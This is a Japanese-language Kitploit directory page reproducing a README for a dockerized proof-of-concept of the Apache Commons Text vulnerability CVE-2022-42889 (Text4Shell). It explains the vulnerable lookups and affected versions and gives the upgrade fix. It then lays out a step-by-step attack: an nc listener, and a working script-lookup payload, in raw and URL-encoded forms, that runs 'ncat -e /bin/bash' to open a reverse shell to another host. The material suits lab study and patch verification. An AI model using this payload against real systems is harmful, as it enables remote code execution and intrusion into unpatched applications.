Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-42889-POC — CVE-2022-42889の脆弱性を悪用する方法を示す、シンプルなdockerizeアプリケーション。 | Kitploit
ツール/GitHubGitHub/akshayithape-devops/cve-2022-42889-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ペイロード開発ラボと実践
GitHubakshayithape-devops/cve-2022-42889-poc

CVE-2022-42889-POC

CVE-2022-42889の脆弱性を悪用する方法を示す、シンプルなdockerizeアプリケーション。

リポジトリを見る
513年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-42889-POC

Apache commons-text の脆弱性 CVE-2022-42889 に対する概念実証(PoC)です。

問題の内容 :

Apache Commons Text は変数補間を実行し、プロパティを動的に評価・展開できるようにします。補間の標準形式は "${prefix:name}" で、"prefix" は補間を実行する org.apache.commons.text.lookup.StringLookup のインスタンスを特定するために使用されます。バージョン 1.5 から 1.9 にかけて、デフォルトの Lookup インスタンス群には、任意のコード実行やリモートサーバーへの接続を引き起こす可能性のあるインターポレーターが含まれていました。これらの lookup は次のとおりです: - "script" - JVM スクリプト実行エンジン (javax.script) を使用して式を実行する - "dns" - DNS レコードを解決する - "url" - リモートサーバーを含む URL から値を読み込む 影響を受けるバージョンでデフォルトの補間機能を使用するアプリケーションは、信頼できない設定値が使用された場合、リモートコード実行や意図しないリモートサーバーへの接続に対して脆弱になる可能性があります。

影響を受けるバージョン :

Apache Commons Text バージョン 1.5 から 1.9

CVE-2022-42889-POC の脆弱性を実演する手順 :

1. Docker を使用してアプリケーションをビルドします(ターミナルタブ 1)

root@kitploit:~
docker build --tag=test/text4shell .

2. アプリケーションを実行します(ターミナルタブ 2)

root@kitploit:~
docker run -it -p 80:8080 --name text4shell test/text4shell

3. 新しいターミナルタブを開き、以下のコマンドを実行します(ターミナルタブ 3)

root@kitploit:~
docker exec -it text4shell /bin/bash

4. ローカルシステムでリバースシェル用のリスナーを開始します(ターミナルタブ 4)

root@kitploit:~
nc -nlvp 8888

5. アプリをテストします(ターミナルタブ 5)

root@kitploit:~
curl http://localhost/text4shell/attack?search=<anything>

6. 攻撃をテストします(ターミナルタブ 5)

攻撃は、プレフィックスが前述の lookup である文字列 "${prefix:name}" を渡すことで実行できます: ${script:javascript:java.lang.Runtime.getRuntime().exec('ncat -e /bin/bash 172.17.0.1 8888')}

root@kitploit:~
curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27ncat%20-e%20%2Fbin%2Fbash%20172.17.0.1%208888%27%29%7D

7. ターミナルタブ 3 に移動して、以下のコマンドを 1 つずつ実行します

root@kitploit:~
pwd
cd /root
pwd
ls

8. ターミナルタブ 5 に移動して、以下のコマンドを 1 つずつ実行します

root@kitploit:~
pwd
cd /root
pwd
ls
touch hacked.txt
ls

9. ターミナルタブ 3 に移動して、以下のコマンドを 1 つずつ実行します

root@kitploit:~
pwd
ls

ls コマンド実行後、ターミナルタブ 3 で hacked.txt ファイルが表示されれば、攻撃が実行されたことになります。

10. すべてのターミナルを閉じます

この脆弱性を修正する方法 :

Apache Commons Text 1.10.0 へのアップグレードが推奨されます。このバージョンでは、問題のあるインターポレーターがデフォルトで無効になっています。

詳細情報 :

  • NVD-NIST
ツールをダウンロード